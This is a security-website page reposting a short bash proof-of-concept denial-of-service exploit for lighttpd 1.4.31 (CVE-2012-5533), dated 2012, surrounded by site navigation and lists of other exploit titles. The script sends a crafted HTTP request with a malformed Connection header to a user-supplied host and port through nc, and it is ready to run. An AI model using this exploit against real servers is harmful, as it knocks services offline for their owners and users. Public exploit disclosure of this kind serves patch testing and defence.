首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
lighttpd 1.4.31 Denial of Service PoC
来源:t4c@ghcif.de 作者:t4c 发布时间:2012-11-23  

#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: t4c@ghcif.de
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
 echo "usage :$0 <Host/IP> <Port>"
else
 echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NetIQ Privileged User Manager
·Narcissus Image Configuration
·TrouSerS Denial Of Service Vul
·Akeni LAN 1.2.118 Filter Bypas
·Apple QuickTime 7.7.2 TeXML St
·LAN.FS Messenger v2.4 Command
·mcrypt <= 2.5.8 STACK based ov
·FormatFactory v3.0.1 Profile F
·Twitter 5.0 Eavesdropping Proo
·NFR Agent FSFUI Record File Up
·BlazeVideo HDTV Player 6.6 Pro
·Media Player Classic XSS / Den
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved